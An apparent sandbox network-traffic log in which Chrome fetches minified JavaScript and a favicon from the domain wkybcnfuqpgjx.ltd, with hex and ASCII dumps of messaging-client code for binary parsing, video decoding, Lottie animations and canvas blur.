                                  2025-01-12 00:03:50 UTC1369INData Raw: 74 68 69 73 2e 72 65 61 64 55 69 6e 74 38 28 29 3b 69 66 28 30 3d 3d 3d 65 29 62 72 65 61 6b 3b 74 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 38 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 61 64 41 6e 79 49 6e 74 28 31 2c 21 30 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 31 36 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 61 64 41 6e 79 49 6e 74 28 32 2c 21 30 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 33 32 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72
                                  Data Ascii: this.readUint8();if(0===e)break;t.push(e)}return String.fromCharCode.apply(null,t)},n.prototype.readInt8=function(){return this.readAnyInt(1,!0)},n.prototype.readInt16=function(){return this.readAnyInt(2,!0)},n.prototype.readInt32=function(){return this.r
                                  2025-01-12 00:03:50 UTC1369INData Raw: 26 28 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 3d 65 29 3b 65 6c 73 65 7b 66 6f 72 28 69 3c 31 26 26 28 69 3d 31 29 3b 65 3e 69 3b 29 69 2a 3d 32 3b 76 61 72 20 73 3d 6e 65 77 20 41 72 72 61 79 42 75 66 66 65 72 28 69 29 2c 72 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 68 69 73 2e 5f 62 75 66 66 65 72 29 3b 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 73 2c 30 2c 72 2e 6c 65 6e 67 74 68 29 2e 73 65 74 28 72 29 2c 74 68 69 73 2e 62 75 66 66 65 72 3d 73 2c 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 3d 65 7d 7d 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 74 72 69 6d 41 6c 6c 6f 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 21 3d 74 68 69 73 2e 5f 62 75 66 66 65 72 2e 62 79 74 65 4c 65 6e
                                  Data Ascii: &(this._byteLength=e);else{for(i<1&&(i=1);e>i;)i*=2;var s=new ArrayBuffer(i),r=new Uint8Array(this._buffer);new Uint8Array(s,0,r.length).set(r),this.buffer=s,this._byteLength=e}}},a.prototype._trimAlloc=function(){if(this._byteLength!=this._buffer.byteLen
                                  2025-01-12 00:03:50 UTC1369INData Raw: 65 29 7c 7c 21 69 73 46 69 6e 69 74 65 28 65 29 3f 30 3a 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 6f 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 3e 3d 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 70 55 69 6e 74 38 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 72 65 61 6c 6c 6f 63 28 31 2a 74 29 3b 76 61 72 20 65 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 68 69 73 2e 5f 62 75 66 66 65 72 2c 74 68 69 73 2e 62 79 74 65 4f 66 66 73 65 74 2b 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 31 2a 74 2c 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65
                                  Data Ascii: e)||!isFinite(e)?0:e},a.prototype.isEof=function(){return this.position>=this._byteLength},a.prototype.mapUint8Array=function(t){this._realloc(1*t);var e=new Uint8Array(this._buffer,this.byteOffset+this.position,t);return this.position+=1*t,e},a.prototype
                                  2025-01-12 00:03:50 UTC1369INData Raw: 68 2d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2f 32 3a 74 3b 76 61 72 20 69 3d 6e 65 77 20 55 69 6e 74 31 36 41 72 72 61 79 28 74 29 3b 72 65 74 75 72 6e 20 61 2e 6d 65 6d 63 70 79 28 69 2e 62 75 66 66 65 72 2c 30 2c 74 68 69 73 2e 62 75 66 66 65 72 2c 74 68 69 73 2e 62 79 74 65 4f 66 66 73 65 74 2b 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 74 2a 69 2e 42 59 54 45 53 5f 50 45 52 5f 45 4c 45 4d 45 4e 54 29 2c 61 2e 61 72 72 61 79 54 6f 4e 61 74 69 76 65 28 69 2c 6e 75 6c 6c 3d 3d 65 3f 74 68 69 73 2e 65 6e 64 69 61 6e 6e 65 73 73 3a 65 29 2c 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 69 2e 62 79 74 65 4c 65 6e 67 74 68 2c 69 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 38 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 6e
                                  Data Ascii: h-this.position/2:t;var i=new Uint16Array(t);return a.memcpy(i.buffer,0,this.buffer,this.byteOffset+this.position,t*i.BYTES_PER_ELEMENT),a.arrayToNative(i,null==e?this.endianness:e),this.position+=i.byteLength,i},a.prototype.readUint8Array=function(t){t=n
                                  2025-01-12 00:03:50 UTC1369INData Raw: 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 33 32 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 64 61 74 61 56 69 65 77 2e 67 65 74 55 69 6e 74 33 32 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 3f 74 68 69 73 2e 65 6e 64 69 61 6e 6e 65 73 73 3a 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 34 2c 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 31 36 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 64 61 74 61 56 69 65 77 2e 67 65 74 55 69 6e 74 31 36 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 3f 74 68 69 73 2e 65 6e 64 69 61 6e 6e 65 73 73 3a 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70
                                  Data Ascii: ,a.prototype.readUint32=function(t){var e=this._dataView.getUint32(this.position,null==t?this.endianness:t);return this.position+=4,e},a.prototype.readUint16=function(t){var e=this._dataView.getUint16(this.position,null==t?this.endianness:t);return this.p
                                  2025-01-12 00:03:50 UTC1369INData Raw: 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 7c 7c 22 41 53 43 49 49 22 3d 3d 65 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 55 69 6e 74 38 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 5b 74 68 69 73 2e 6d 61 70 55 69 6e 74 38 41 72 72 61 79 28 6e 75 6c 6c 3d 3d 74 3f 74 68 69 73 2e 62 79 74 65 4c 65 6e 67 74 68 2d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 3a 74 29 5d 29 3a 6e 65 77 20 54 65 78 74 44 65 63 6f 64 65 72 28 65 29 2e 64 65 63 6f 64 65 28 74 68 69 73 2e 6d 61 70 55 69 6e 74 38 41 72 72 61 79 28 74 29 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 43 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 62 79 74 65 4c 65 6e 67 74 68 2d 74 68 69 73
                                  Data Ascii: ng=function(t,e){return null==e||"ASCII"==e?String.fromCharCodeUint8.apply(null,[this.mapUint8Array(null==t?this.byteLength-this.position:t)]):new TextDecoder(e).decode(this.mapUint8Array(t))},a.prototype.readCString=function(t){var e=this.byteLength-this
                                  2025-01-12 00:03:50 UTC1369INData Raw: 6e 61 6d 69 63 53 69 7a 65 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 74 68 69 73 2e 5f 74 72 69 6d 41 6c 6c 6f 63 28 29 2c 74 68 69 73 2e 5f 64 79 6e 61 6d 69 63 53 69 7a 65 3d 74 7d 7d 29 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 69 66 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6e 65 77 20 41 72 72 61 79 42 75 66 66 65 72 28 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 2d 74 29 2c 69 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 65 29 2c 73 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 68 69 73 2e 5f 62 75 66 66 65 72 2c 74 2c 69 2e 6c 65 6e 67 74 68 29 3b 69 2e 73 65 74 28 73 29 2c 74 68 69 73 2e 62 75 66 66 65 72 3d 65 2c 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2d 3d 74 7d 2c 61 2e 70 72 6f 74 6f 74 79
                                  Data Ascii: namicSize},set:function(t){t||this._trimAlloc(),this._dynamicSize=t}}),a.prototype.shift=function(t){var e=new ArrayBuffer(this._byteLength-t),i=new Uint8Array(e),s=new Uint8Array(this._buffer,t,i.length);i.set(s),this.buffer=e,this.position-=t},a.prototy


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.649857172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC369OUTGET /2976.4e6e9b1254ce313f06c5.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:49 UTC917INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:49 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-3878"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9FEZwgvhYD84mXIUkn9PSmfPLyN3XdplSEDUFD1Kzcm766VCfCRKk%2Bp4fR2U4GgqgIBrRX%2Fq5yG902gbaUG4LEqTB5N7jhDuzLGMk5QY9f5pe14MgaNOAhHigdNQsZ3fUjzMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ba4b12439c-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=2369&rtt_var=1184&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=947&delivery_rate=371312&cwnd=224&unsent_bytes=0&cid=09f399fcd6e8fdd8&ts=148&x=0"
                                  2025-01-12 00:03:49 UTC452INData Raw: 33 38 37 38 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 2c 72 3d 7b 32 39 37 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 76 61 72 20 61 3d 72 28 37 37 38 34 29 3b 63 6f 6e 73 74 20 6f 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 34 35 30 29 2c 6e 65 77 20 53 65 74 28 5b 22 6e 65 77 4d 65 73 73 61 67 65 22 2c 22 6e 65 77 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 22 2c 22 64 65 6c 65 74 65 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 48 69 73 74 6f 72 79 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 69 6d 61
                                  Data Ascii: 3878(()=>{"use strict";var e,t,r={2976:(e,t,r)=>{var a=r(7784);const o=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set(["ima
                                  2025-01-12 00:03:49 UTC1369INData Raw: 28 5b 22 61 75 64 69 6f 2f 6d 70 33 22 2c 22 61 75 64 69 6f 2f 6f 67 67 22 2c 22 61 75 64 69 6f 2f 77 61 76 22 2c 22 61 75 64 69 6f 2f 6d 70 65 67 22 2c 22 61 75 64 69 6f 2f 66 6c 61 63 22 2c 22 61 75 64 69 6f 2f 61 61 63 22 2c 22 61 75 64 69 6f 2f 6d 34 61 22 2c 22 61 75 64 69 6f 2f 6d 70 34 22 2c 22 61 75 64 69 6f 2f 78 2d 6d 34 61 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 2e 2e 2e 6f 2c 2e 2e 2e 69 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 55 53 45 52 4e 41 4d 45 5f 50 55 52 43 48 41 53 45 5f 41 56 41 49 4c 41 42 4c 45 22 2c 22 55 53 45 52 4e 41 4d 45 5f 49 4e 56 41 4c 49 44 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 74 2e 6d 65 22 2c 22 77 65 62 2e 74 2e 6d 65 22 2c 22 61 2e 74 2e 6d 65 22 2c 22 6b 2e 74 2e 6d 65 22 2c 22 7a 2e 74 2e 6d 65 22 5d 29 2c 6e 65
                                  Data Ascii: (["audio/mp3","audio/ogg","audio/wav","audio/mpeg","audio/flac","audio/aac","audio/m4a","audio/mp4","audio/x-m4a"]),new Set([...o,...i]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"]),ne
                                  2025-01-12 00:03:49 UTC1369INData Raw: 63 68 61 6e 6e 65 6c 3d 3d 3d 74 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 61 29 7b 61 7c 7c 28 61 3d 65 3d 3e 7b 72 28 7b 74 79 70 65 3a 22 75 70 64 61 74 65 22 2c 75 70 64 61 74 65 3a 65 7d 29 7d 29 2c 74 2e 70 61 79 6c 6f 61 64 73 2e 66 6f 72 45 61 63 68 28 28 61 73 79 6e 63 20 74 3d 3e 7b 73 77 69 74 63 68 28 74 2e 74 79 70 65 29 7b 63 61 73 65 22 69 6e 69 74 22 3a 7b 63 6f 6e 73 74 7b 61 72 67 73 3a 72 7d 3d 74 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 61 77 61 69 74 20 65 28 22 69 6e 69 74 22 2c 61 2c 2e 2e 2e 72 29 3a 61 77 61 69 74 28 65 2e 69 6e 69 74 3f 2e 28 61 2c 2e 2e 2e 72 29 29 3b 62 72 65 61 6b 7d 63 61 73 65 22 63 61 6c 6c 4d 65 74 68 6f 64 22 3a 7b 63 6f 6e 73 74 7b 6d 65 73 73 61 67 65 49 64 3a 61 2c 6e
                                  Data Ascii: channel===t&&function(e,t,r,a){a||(a=e=>{r({type:"update",update:e})}),t.payloads.forEach((async t=>{switch(t.type){case"init":{const{args:r}=t;"function"==typeof e?await e("init",a,...r):await(e.init?.(a,...r));break}case"callMethod":{const{messageId:a,n
                                  2025-01-12 00:03:49 UTC1369INData Raw: 75 6d 62 65 72 22 2c 22 6e 75 6d 62 65 72 22 5d 29 2c 6c 6f 61 64 46 72 6f 6d 44 61 74 61 3a 4d 6f 64 75 6c 65 2e 63 77 72 61 70 28 22 6c 6f 74 74 69 65 5f 6c 6f 61 64 5f 66 72 6f 6d 5f 64 61 74 61 22 2c 22 6e 75 6d 62 65 72 22 2c 5b 22 6e 75 6d 62 65 72 22 2c 22 6e 75 6d 62 65 72 22 5d 29 7d 2c 65 28 29 7d 7d 29 29 2c 68 3d 6e 65 77 20 4d 61 70 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 66 65 74 63 68 28 65 29 2c 72 3d 74 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 3b 69 66 28 72 3f 2e 73 74 61 72 74 73 57 69 74 68 28 22 74 65 78 74 2f 22 29 29 72 65 74 75 72 6e 20 74 2e 74 65 78 74 28 29 3b 63 6f 6e 73 74 20 6f 3d 61 77 61 69 74 20 74 2e 61 72 72 61 79
                                  Data Ascii: umber","number"]),loadFromData:Module.cwrap("lottie_load_from_data","number",["number","number"])},e()}})),h=new Map;async function m(e){const t=await fetch(e),r=t.headers.get("Content-Type");if(r?.startsWith("text/"))return t.text();const o=await t.array
                                  2025-01-12 00:03:49 UTC1369INData Raw: 65 74 28 64 29 3b 72 28 74 2c 61 77 61 69 74 20 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 28 6e 29 29 7d 2c 22 72 6c 6f 74 74 69 65 3a 64 65 73 74 72 6f 79 22 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 6c 65 74 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 68 2e 67 65 74 28 74 29 3b 75 2e 64 65 73 74 72 6f 79 28 65 2e 68 61 6e 64 6c 65 29 2c 68 2e 64 65 6c 65 74 65 28 74 29 7d 63 61 74 63 68 28 61 29 7b 72 7c 7c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 65 28 74 2c 21 30 29 29 2c 31 65 33 29 7d 7d 7d 2c 22 6d 65 64 69 61 22 29 3b 76 61 72 20 67 3d 72 28 35 39 30 35 29 3b 63
                                  Data Ascii: et(d);r(t,await createImageBitmap(n))},"rlottie:destroy":function e(t){let r=arguments.length>1&&void 0!==arguments[1]&&arguments[1];try{const e=h.get(t);u.destroy(e.handle),h.delete(t)}catch(a){r||setTimeout((()=>e(t,!0)),1e3)}}},"media");var g=r(5905);c
                                  2025-01-12 00:03:49 UTC1369INData Raw: 74 68 69 73 2e 69 73 50 6f 6c 79 66 69 6c 6c 3d 6e 2c 74 68 69 73 2e 6f 6e 43 6f 6e 66 69 67 3d 72 2c 74 68 69 73 2e 6f 6e 43 68 75 6e 6b 3d 61 2c 74 68 69 73 2e 66 69 6c 65 3d 67 2e 63 72 65 61 74 65 46 69 6c 65 28 29 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 45 72 72 6f 72 3d 65 3d 3e 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 52 65 61 64 79 3d 74 68 69 73 2e 6f 6e 52 65 61 64 79 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 53 61 6d 70 6c 65 73 3d 74 68 69 73 2e 6f 6e 53 61 6d 70 6c 65 73 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 6c 6f 61 64 4d 65 74 61 64 61 74 61 28 29 7d 61 73 79 6e 63 20 6c 6f 61 64 4d 65 74 61 64 61 74 61 28 29 7b 6c 65 74 20 65 3d 30 3b 66 6f 72 28
                                  Data Ascii: this.isPolyfill=n,this.onConfig=r,this.onChunk=a,this.file=g.createFile(),this.file.onError=e=>{console.error(e)},this.file.onReady=this.onReady.bind(this),this.file.onSamples=this.onSamples.bind(this),this.loadMetadata()}async loadMetadata(){let e=0;for(
                                  2025-01-12 00:03:49 UTC1369INData Raw: 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 66 69 6c 65 2e 67 65 74 54 72 61 63 6b 42 79 49 64 28 65 2e 69 64 29 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 2e 6d 64 69 61 2e 6d 69 6e 66 2e 73 74 62 6c 2e 73 74 73 64 2e 65 6e 74 72 69 65 73 29 69 66 28 65 2e 61 76 63 43 7c 7c 65 2e 68 76 63 43 7c 7c 65 2e 61 76 31 43 29 7b 63 6f 6e 73 74 20 74 3d 6e 65 77 20 67 2e 44 61 74 61 53 74 72 65 61 6d 28 76 6f 69 64 20 30 2c 30 2c 67 2e 44 61 74 61 53 74 72 65 61 6d 2e 42 49 47 5f 45 4e 44 49 41 4e 29 3b 72 65 74 75 72 6e 20 65 2e 61 76 63 43 3f 65 2e 61 76 63 43 2e 77 72 69 74 65 28 74 29 3a 65 2e 68 76 63 43 3f 65 2e 68 76 63 43 2e 77 72 69 74 65 28 74 29 3a 65 2e 61 76 31 43 26 26 65 2e 61 76 31 43 2e 77 72 69 74 65 28 74 29 2c 6e 65 77 20
                                  Data Ascii: on(e){const t=this.file.getTrackById(e.id);for(const e of t.mdia.minf.stbl.stsd.entries)if(e.avcC||e.hvcC||e.av1C){const t=new g.DataStream(void 0,0,g.DataStream.BIG_ENDIAN);return e.avcC?e.avcC.write(t):e.hvcC?e.hvcC.write(t):e.av1C&&e.av1C.write(t),new
                                  2025-01-12 00:03:49 UTC1369INData Raw: 67 28 22 5b 56 69 64 65 6f 20 50 72 65 76 69 65 77 5d 20 57 65 62 43 6f 64 65 63 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 7b 6b 3d 65 7d 29 29 3b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 53 65 74 3b 72 65 74 75 72 6e 20 53 3d 6e 65 77 20 56 69 64 65 6f 44 65 63 6f 64 65 72 28 7b 61 73 79 6e 63 20 6f 75 74 70 75 74 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 74 69 6d 65 73 74 61 6d 70 2f 31 65 36 2c 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 29 3b 69 66 28 21 6e 2e 68 61 73 28 72 29 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 28 65 29 3b 6e 2e 61 64 64 28 72 29 2c 6f 28 72 2c 74 29 7d 65 2e 63 6c 6f 73 65 28 29 7d 2c 65 72 72 6f 72 28 65 29 7b 63 6f
                                  Data Ascii: g("[Video Preview] WebCodecs not supported"),new Promise((e=>{k=e}));const n=new Set;return S=new VideoDecoder({async output(e){const t=e.timestamp/1e6,r=Math.floor(t);if(!n.has(r)){const t=await createImageBitmap(e);n.add(r),o(r,t)}e.close()},error(e){co
                                  2025-01-12 00:03:49 UTC1369INData Raw: 37 38 2c 31 37 36 2c 31 37 35 2c 31 37 33 2c 31 37 31 2c 38 35 2c 32 31 2c 31 36 37 2c 31 36 35 2c 34 31 2c 31 36 33 2c 31 36 31 2c 35 2c 37 39 2c 31 35 37 2c 37 38 2c 31 35 34 2c 31 35 33 2c 31 39 2c 37 35 2c 31 34 39 2c 37 34 2c 31 34 37 2c 37 33 2c 31 34 34 2c 31 34 33 2c 37 31 2c 31 34 31 2c 31 34 30 2c 31 33 39 2c 31 33 37 2c 31 37 2c 31 33 35 2c 31 33 34 2c 31 33 33 2c 36 36 2c 31 33 31 2c 36 35 2c 31 32 39 2c 31 5d 2c 49 3d 5b 30 2c 39 2c 31 30 2c 31 30 2c 31 34 2c 31 32 2c 31 34 2c 31 34 2c 31 36 2c 31 35 2c 31 36 2c 31 35 2c 31 36 2c 31 35 2c 31 35 2c 31 37 2c 31 38 2c 31 37 2c 31 32 2c 31 38 2c 31 36 2c 31 37 2c 31 37 2c 31 39 2c 31 39 2c 31 38 2c 31 39 2c 31 38 2c 31 38 2c 31 39 2c 31 39 2c 31 39 2c 32 30 2c 31 39 2c 32 30 2c 32 30 2c 32 30 2c
                                  Data Ascii: 78,176,175,173,171,85,21,167,165,41,163,161,5,79,157,78,154,153,19,75,149,74,147,73,144,143,71,141,140,139,137,17,135,134,133,66,131,65,129,1],I=[0,9,10,10,14,12,14,14,16,15,16,15,16,15,15,17,18,17,12,18,16,17,17,19,19,18,19,18,18,19,19,19,20,19,20,20,20,
                                  2025-01-12 00:03:49 UTC1369INData Raw: 7d 3d 65 2c 6e 3d 65 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 2c 73 3d 22 66 69 6c 74 65 72 22 69 6e 20 6e 3b 73 26 26 28 6e 2e 66 69 6c 74 65 72 3d 60 62 6c 75 72 28 24 7b 72 7d 70 78 29 60 29 2c 6e 2e 64 72 61 77 49 6d 61 67 65 28 61 2c 32 2a 2d 72 2c 32 2a 2d 72 2c 6f 2b 34 2a 72 2c 69 2b 34 2a 72 29 2c 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 61 2c 6f 2c 69 2c 6e 29 7b 69 66 28 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 69 29 7c 7c 69 3c 31 29 72 65 74 75 72 6e 3b 69 7c 3d 30 2c 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 6e 29 26 26 28 6e 3d 31 29 2c 28 6e 7c 3d 30 29 3e 33 26 26 28 6e 3d 33 29 2c 6e 3c 31 26 26 28 6e 3d 31 29 3b 63 6f 6e 73 74 20 73 3d 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 61 2c 6f 29 2c 63 3d 73 2e
                                  Data Ascii: }=e,n=e.getContext("2d"),s="filter"in n;s&&(n.filter=`blur(${r}px)`),n.drawImage(a,2*-r,2*-r,o+4*r,i+4*r),s||function(e,t,r,a,o,i,n){if(Number.isNaN(i)||i<1)return;i|=0,Number.isNaN(n)&&(n=1),(n|=0)>3&&(n=3),n<1&&(n=1);const s=e.getImageData(0,0,a,o),c=s.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.649859172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC352OUTGET /favicon.ico HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:49 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:49 GMT
                                  Content-Type: image/x-icon
                                  Content-Length: 2409
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-969"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2FGtgV59Ga3Bahdp98jP8k8bSKYTjmhKBniP1j14olWv6DOC4Uabr4Gr3bffKazH4TKiALPxe9KcR75XCWrEbxuUd3tFeSYVK0dXeHXgwwrDjA7pNkkyV1zDXaboD2FgS%2FzxEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2bb486d4228-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1730&rtt_var=865&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=930&delivery_rate=393054&cwnd=209&unsent_bytes=0&cid=be42dcacf6efc3c0&ts=290&x=0"
